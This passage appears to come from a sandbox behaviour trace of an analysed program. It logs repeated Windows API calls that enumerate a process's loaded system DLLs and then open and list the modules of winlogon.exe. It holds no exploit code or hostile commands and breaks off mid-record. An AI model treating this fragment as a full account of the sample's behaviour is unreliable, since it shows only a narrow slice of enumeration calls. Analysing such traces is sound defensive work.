(normalized: "c:\\windows\\system32\\sxs.dll")) returned 0x1b [0055.238] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fef97b0000, lpmodinfo=0x253fcc0, cb=0x18 | out: lpmodinfo=0x253fcc0*(lpBaseOfDll=0x7fef97b0000, SizeOfImage=0x74000, EntryPoint=0x7fef97b66f0)) returned 1 [0055.239] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fef97b0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="netprofm.dll") returned 0xc [0055.240] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fef97b0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll")) returned 0x20 [0055.242] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefb3f0000, lpmodinfo=0x2541e90, cb=0x18 | out: lpmodinfo=0x2541e90*(lpBaseOfDll=0x7fefb3f0000, SizeOfImage=0x15000, EntryPoint=0x7fefb3f60d8)) returned 1 [0055.244] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefb3f0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="nlaapi.dll") returned 0xa [0055.246] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefb3f0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll")) returned 0x1e [0055.247] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefa1b0000, lpmodinfo=0x2544050, cb=0x18 | out: lpmodinfo=0x2544050*(lpBaseOfDll=0x7fefa1b0000, SizeOfImage=0x19000, EntryPoint=0x7fefa1b2b50)) returned 1 [0055.249] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefa1b0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="wdi.dll") returned 0x7 [0055.250] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefa1b0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\wdi.dll" (normalized: "c:\\windows\\system32\\wdi.dll")) returned 0x1b [0055.252] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefa5d0000, lpmodinfo=0x2546200, cb=0x18 | out: lpmodinfo=0x2546200*(lpBaseOfDll=0x7fefa5d0000, SizeOfImage=0xc000, EntryPoint=0x7fefa5d602c)) returned 1 [0055.253] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefa5d0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="npmproxy.dll") returned 0xc [0055.255] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefa5d0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll")) returned 0x20 [0055.257] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fef9420000, lpmodinfo=0x25483d0, cb=0x18 | out: lpmodinfo=0x25483d0*(lpBaseOfDll=0x7fef9420000, SizeOfImage=0xd8000, EntryPoint=0x7fef94aa7d0)) returned 1 [0055.259] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fef9420000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="perftrack.dll") returned 0xd [0055.260] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fef9420000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\perftrack.dll" (normalized: "c:\\windows\\system32\\perftrack.dll")) returned 0x21 [0055.262] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fef93a0000, lpmodinfo=0x254a5a0, cb=0x18 | out: lpmodinfo=0x254a5a0*(lpBaseOfDll=0x7fef93a0000, SizeOfImage=0x7c000, EntryPoint=0x7fef93a11d4)) returned 1 [0055.263] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fef93a0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="wer.dll") returned 0x7 [0055.265] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fef93a0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\wer.dll" (normalized: "c:\\windows\\system32\\wer.dll")) returned 0x1b [0055.267] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefbca0000, lpmodinfo=0x254c750, cb=0x18 | out: lpmodinfo=0x254c750*(lpBaseOfDll=0x7fefbca0000, SizeOfImage=0x18000, EntryPoint=0x7fefbca1130)) returned 1 [0055.269] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefbca0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="dwmapi.dll") returned 0xa [0055.270] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefbca0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll")) returned 0x1e [0055.272] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefd610000, lpmodinfo=0x254e910, cb=0x18 | out: lpmodinfo=0x254e910*(lpBaseOfDll=0x7fefd610000, SizeOfImage=0xb000, EntryPoint=0x7fefd611030)) returned 1 [0055.274] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefd610000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="Secur32.dll") returned 0xb [0055.276] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefd610000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\Secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll")) returned 0x1f [0055.278] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefd640000, lpmodinfo=0x2550d00, cb=0x18 | out: lpmodinfo=0x2550d00*(lpBaseOfDll=0x7fefd640000, SizeOfImage=0x25000, EntryPoint=0x7fefd649658)) returned 1 [0055.279] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefd640000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="SSPICLI.DLL") returned 0xb [0055.281] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefd640000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\SSPICLI.DLL" (normalized: "c:\\windows\\system32\\sspicli.dll")) returned 0x1f [0055.283] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefa0d0000, lpmodinfo=0x2552ec0, cb=0x18 | out: lpmodinfo=0x2552ec0*(lpBaseOfDll=0x7fefa0d0000, SizeOfImage=0x12000, EntryPoint=0x7fefa0d1050)) returned 1 [0055.285] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefa0d0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="AEPIC.dll") returned 0x9 [0055.288] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefa0d0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\AEPIC.dll" (normalized: "c:\\windows\\system32\\aepic.dll")) returned 0x1d [0055.290] GetModuleInformation (in: hProcess=0x21c, hModule=0x73ff0000, lpmodinfo=0x2555080, cb=0x18 | out: lpmodinfo=0x2555080*(lpBaseOfDll=0x73ff0000, SizeOfImage=0x3000, EntryPoint=0x0)) returned 1 [0055.292] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x73ff0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="sfc.dll") returned 0x7 [0055.294] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x73ff0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\sfc.dll" (normalized: "c:\\windows\\system32\\sfc.dll")) returned 0x1b [0055.296] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefa0c0000, lpmodinfo=0x2557230, cb=0x18 | out: lpmodinfo=0x2557230*(lpBaseOfDll=0x7fefa0c0000, SizeOfImage=0x10000, EntryPoint=0x7fefa0c1010)) returned 1 [0055.298] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefa0c0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="sfc_os.DLL") returned 0xa [0055.300] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefa0c0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\sfc_os.DLL" (normalized: "c:\\windows\\system32\\sfc_os.dll")) returned 0x1e [0055.302] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefc940000, lpmodinfo=0x25593f0, cb=0x18 | out: lpmodinfo=0x25593f0*(lpBaseOfDll=0x7fefc940000, SizeOfImage=0xc000, EntryPoint=0x7fefc941064)) returned 1 [0055.304] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefc940000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="VERSION.dll") returned 0xb [0055.306] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefc940000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\VERSION.dll" (normalized: "c:\\windows\\system32\\version.dll")) returned 0x1f [0055.308] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefb270000, lpmodinfo=0x255b5b0, cb=0x18 | out: lpmodinfo=0x255b5b0*(lpBaseOfDll=0x7fefb270000, SizeOfImage=0x27000, EntryPoint=0x7fefb2798bc)) returned 1 [0055.310] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefb270000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="IPHLPAPI.DLL") returned 0xc [0055.313] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefb270000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll")) returned 0x20 [0055.315] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefb260000, lpmodinfo=0x255d780, cb=0x18 | out: lpmodinfo=0x255d780*(lpBaseOfDll=0x7fefb260000, SizeOfImage=0xb000, EntryPoint=0x7fefb261198)) returned 1 [0055.317] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefb260000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="WINNSI.DLL") returned 0xa [0055.319] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefb260000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WINNSI.DLL" (normalized: "c:\\windows\\system32\\winnsi.dll")) returned 0x1e [0055.322] GetModuleInformation (in: hProcess=0x21c, hModule=0x7feff970000, lpmodinfo=0x255f940, cb=0x18 | out: lpmodinfo=0x255f940*(lpBaseOfDll=0x7feff970000, SizeOfImage=0x4d000, EntryPoint=0x7feff971070)) returned 1 [0055.324] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7feff970000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="WS2_32.dll") returned 0xa [0055.326] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7feff970000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WS2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")) returned 0x1e [0055.328] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefcb00000, lpmodinfo=0x2561b00, cb=0x18 | out: lpmodinfo=0x2561b00*(lpBaseOfDll=0x7fefcb00000, SizeOfImage=0x1b000, EntryPoint=0x7fefcb02068)) returned 1 [0055.330] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefcb00000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="GPAPI.dll") returned 0x9 [0055.333] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefcb00000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\GPAPI.dll" (normalized: "c:\\windows\\system32\\gpapi.dll")) returned 0x1d [0055.335] GetModuleInformation (in: hProcess=0x21c, hModule=0x7feff2d0000, lpmodinfo=0x2563cc0, cb=0x18 | out: lpmodinfo=0x2563cc0*(lpBaseOfDll=0x7feff2d0000, SizeOfImage=0x71000, EntryPoint=0x7feff2e1e20)) returned 1 [0055.337] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7feff2d0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="SHLWAPI.dll") returned 0xb [0055.339] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7feff2d0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\SHLWAPI.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")) returned 0x1f [0055.342] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefcc70000, lpmodinfo=0x2565e80, cb=0x18 | out: lpmodinfo=0x2565e80*(lpBaseOfDll=0x7fefcc70000, SizeOfImage=0xa000, EntryPoint=0x7fefcc73cb8)) returned 1 [0055.344] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefcc70000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="credssp.dll") returned 0xb [0055.346] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefcc70000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll")) returned 0x1f [0055.349] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefce90000, lpmodinfo=0x2568040, cb=0x18 | out: lpmodinfo=0x2568040*(lpBaseOfDll=0x7fefce90000, SizeOfImage=0x5b000, EntryPoint=0x7fefce96940)) returned 1 [0055.358] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefce90000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="DNSAPI.dll") returned 0xa [0055.361] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefce90000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\DNSAPI.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll")) returned 0x1e [0055.363] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fef9160000, lpmodinfo=0x256a200, cb=0x18 | out: lpmodinfo=0x256a200*(lpBaseOfDll=0x7fef9160000, SizeOfImage=0x15000, EntryPoint=0x7fef91612a0)) returned 1 [0055.365] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fef9160000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="napinsp.dll") returned 0xb [0055.368] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fef9160000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\napinsp.dll" (normalized: "c:\\windows\\system32\\napinsp.dll")) returned 0x1f [0055.370] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fef9180000, lpmodinfo=0x256c3c0, cb=0x18 | out: lpmodinfo=0x256c3c0*(lpBaseOfDll=0x7fef9180000, SizeOfImage=0x19000, EntryPoint=0x7fef918177c)) returned 1 [0055.373] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fef9180000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="pnrpnsp.dll") returned 0xb [0055.375] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fef9180000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\pnrpnsp.dll" (normalized: "c:\\windows\\system32\\pnrpnsp.dll")) returned 0x1f [0055.378] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefd010000, lpmodinfo=0x256e580, cb=0x18 | out: lpmodinfo=0x256e580*(lpBaseOfDll=0x7fefd010000, SizeOfImage=0x55000, EntryPoint=0x7fefd011054)) returned 1 [0055.380] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefd010000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="mswsock.dll") returned 0xb [0055.383] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefd010000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll")) returned 0x1f [0055.385] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fef9220000, lpmodinfo=0x2570740, cb=0x18 | out: lpmodinfo=0x2570740*(lpBaseOfDll=0x7fef9220000, SizeOfImage=0xb000, EntryPoint=0x7fef92212e0)) returned 1 [0055.388] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fef9220000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="winrnr.dll") returned 0xa [0055.390] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fef9220000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\winrnr.dll" (normalized: "c:\\windows\\system32\\winrnr.dll")) returned 0x1e [0055.393] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefca10000, lpmodinfo=0x2572900, cb=0x18 | out: lpmodinfo=0x2572900*(lpBaseOfDll=0x7fefca10000, SizeOfImage=0x7000, EntryPoint=0x7fefca114b0)) returned 1 [0055.395] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefca10000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="wshtcpip.dll") returned 0xc [0055.398] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefca10000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\wshtcpip.dll" (normalized: "c:\\windows\\system32\\wshtcpip.dll")) returned 0x20 [0055.401] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefd000000, lpmodinfo=0x2574ad0, cb=0x18 | out: lpmodinfo=0x2574ad0*(lpBaseOfDll=0x7fefd000000, SizeOfImage=0x7000, EntryPoint=0x7fefd00142c)) returned 1 [0055.403] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefd000000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="wship6.dll") returned 0xa [0055.406] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefd000000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll")) returned 0x1e [0055.409] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fef9530000, lpmodinfo=0x2576ca8, cb=0x18 | out: lpmodinfo=0x2576ca8*(lpBaseOfDll=0x7fef9530000, SizeOfImage=0x8000, EntryPoint=0x7fef9531414)) returned 1 [0055.411] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fef9530000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="rasadhlp.dll") returned 0xc [0055.415] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fef9530000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll")) returned 0x20 [0055.418] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefac50000, lpmodinfo=0x2578e78, cb=0x18 | out: lpmodinfo=0x2578e78*(lpBaseOfDll=0x7fefac50000, SizeOfImage=0x53000, EntryPoint=0x7fefac52b98)) returned 1 [0055.421] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefac50000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="fwpuclnt.dll") returned 0xc [0055.423] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefac50000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\fwpuclnt.dll" (normalized: "c:\\windows\\system32\\fwpuclnt.dll")) returned 0x20 [0055.426] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefac20000, lpmodinfo=0x257b048, cb=0x18 | out: lpmodinfo=0x257b048*(lpBaseOfDll=0x7fefac20000, SizeOfImage=0x11000, EntryPoint=0x7fefac216ac)) returned 1 [0055.429] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefac20000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="dhcpcsvc6.DLL") returned 0xd [0055.432] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefac20000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\dhcpcsvc6.DLL" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll")) returned 0x21 [0055.435] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefac00000, lpmodinfo=0x257d218, cb=0x18 | out: lpmodinfo=0x257d218*(lpBaseOfDll=0x7fefac00000, SizeOfImage=0x18000, EntryPoint=0x7fefac01bf8)) returned 1 [0055.437] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefac00000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="dhcpcsvc.DLL") returned 0xc [0055.440] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefac00000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\dhcpcsvc.DLL" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll")) returned 0x20 [0055.444] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1ac) returned 0x21c [0055.444] EnumProcessModules (in: hProcess=0x21c, lphModule=0x2580a00, cb=0x200, lpcbNeeded=0x41eb20 | out: lphModule=0x2580a00, lpcbNeeded=0x41eb20) returned 1 [0055.448] GetModuleInformation (in: hProcess=0x21c, hModule=0xffe00000, lpmodinfo=0x2580c88, cb=0x18 | out: lpmodinfo=0x2580c88*(lpBaseOfDll=0xffe00000, SizeOfImage=0x62000, EntryPoint=0xffe108d8)) returned 1 [0055.448] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0xffe00000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="winlogon.exe") returned 0xc [0055.448] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0xffe00000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\winlogon.exe" (normalized: "c:\\windows\\system32\\winlogon.exe")) returned 0x20 [0055.449] GetModuleInformation (in: hProcess=0x21c, hModule=0x77830000, lpmodinfo=0x2582e90, cb=0x18 | out: lpmodinfo=0x2582e90*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0055.449] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x77830000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0055.449] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x77830000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0055.449] GetModuleInformation (in: hProcess=0x21c, hModule=0x77710000, lpmodinfo=0x2585050, cb=0x18 | out: lpmodinfo=0x2585050*(lpBaseOfDll=0x77710000, SizeOfImage=0x11f000, EntryPoint=0x77725340)) returned 1 [0055.450] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x77710000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="kernel32.dll") returned 0xc [0055.450] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x77710000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")) returned 0x20 [0055.451] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefd910000, lpmodinfo=0x2587220, cb=0x18 | out: lpmodinfo=0x2587220*(lpBaseOfDll=0x7fefd910000, SizeOfImage=0x6c000, EntryPoint=0x7fefd912780)) returned 1 [0055.451] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefd910000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="KERNELBASE.dll") returned 0xe [0055.451] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefd910000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\KERNELBASE.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")) returned 0x22 [0055.452] GetModuleInformation (in: hProcess=0x21c, hModule=0x77610000, lpmodinfo=0x25893f0, cb=0x18 | out: lpmodinfo=0x25893f0*(lpBaseOfDll=0x77610000, SizeOfImage=0xfa000, EntryPoint=0x7762a2c8)) returned 1 [0055.452] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x77610000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="USER32.dll") returned 0xa [0055.453] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x77610000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\USER32.dll" (normalized: "c:\\windows\\system32\\user32.dll")) returned 0x1e [0055.453] GetModuleInformation (in: hProcess=0x21c, hModule=0x7feff1c0000, lpmodinfo=0x258b608, cb=0x18 | out: lpmodinfo=0x258b608*(lpBaseOfDll=0x7feff1c0000, SizeOfImage=0x67000, EntryPoint=0x7feff1cb03c)) returned 1 [0055.453] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7feff1c0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="GDI32.dll") returned 0x9 [0055.454] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7feff1c0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\GDI32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")) returned 0x1d [0055.454] GetModuleInformation (in: hProcess=0x21c, hModule=0x7feff350000, lpmodinfo=0x258d7c8, cb=0x18 | out: lpmodinfo=0x258d7c8*(lpBaseOfDll=0x7feff350000, SizeOfImage=0xe000, EntryPoint=0x7feff351080)) returned 1 [0055.455] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7feff350000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="LPK.dll") returned 0x7 [0055.456] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7feff350000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\LPK.dll" (normalized: "c:\\windows\\system32\\lpk.dll")) returned 0x1b [0055.456] GetModuleInformation (in: hProcess=0x21c, hModule=0x7feff690000, lpmodinfo=0x258f978, cb=0x18 | out: lpmodinfo=0x258f978*(lpBaseOfDll=0x7feff690000, SizeOfImage=0xc9000, EntryPoint=0x7feff70a874)) returned 1 [0055.457] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7feff690000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="USP10.dll") returned 0x9 [0055.457] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7feff690000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\USP10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")) returned 0x1d [0055.458] GetModuleInformation (in: hProcess=0x21c, hModule=0x7feff100000, lpmodinfo=0x2591b38, cb=0x18 | out: lpmodinfo=0x2591b38*(lpBaseOfDll=0x7feff100000, SizeOfImage=0x9f000, EntryPoint=0x7feff1025a0)) returned 1 [0055.458] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7feff100000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="msvcrt.dll") returned 0xa [0055.459] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7feff100000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")) returned 0x1e [0055.460] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefd720000, lpmodinfo=0x2593d90, cb=0x18 | out: lpmodinfo=0x2593d90*(lpBaseOfDll=0x7fefd720000, SizeOfImage=0x3d000, EntryPoint=0x7fefd7218f4)) returned 1 [0055.460] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefd720000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="WINSTA.dll") returned 0xa [0055.461] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefd720000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WINSTA.dll" (normalized: "c:\\windows\\system32\\winsta.dll")) returned 0x1e [0055.462] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefdb50000, lpmodinfo=0x2595f50, cb=0x18 | out: lpmodinfo=0x2595f50*(lpBaseOfDll=0x7fefdb50000, SizeOfImage=0x12d000, EntryPoint=0x7fefdb9ed50)) returned 1 [0055.463] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefdb50000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="RPCRT4.dll") returned 0xa [0055.463] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefdb50000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\RPCRT4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")) returned 0x1e [0055.464] GetModuleInformation (in: hProcess=0x21c, hModule=0x7feff400000, lpmodinfo=0x2598110, cb=0x18 | out: lpmodinfo=0x2598110*(lpBaseOfDll=0x7feff400000, SizeOfImage=0x2e000, EntryPoint=0x7feff401010)) returned 1 [0055.465] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7feff400000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="IMM32.DLL") returned 0x9 [0055.466] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7feff400000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\IMM32.DLL" (normalized: "c:\\windows\\system32\\imm32.dll")) returned 0x1d [0055.466] GetModuleInformation (in: hProcess=0x21c, hModule=0x7feff9d0000, lpmodinfo=0x259a2d0, 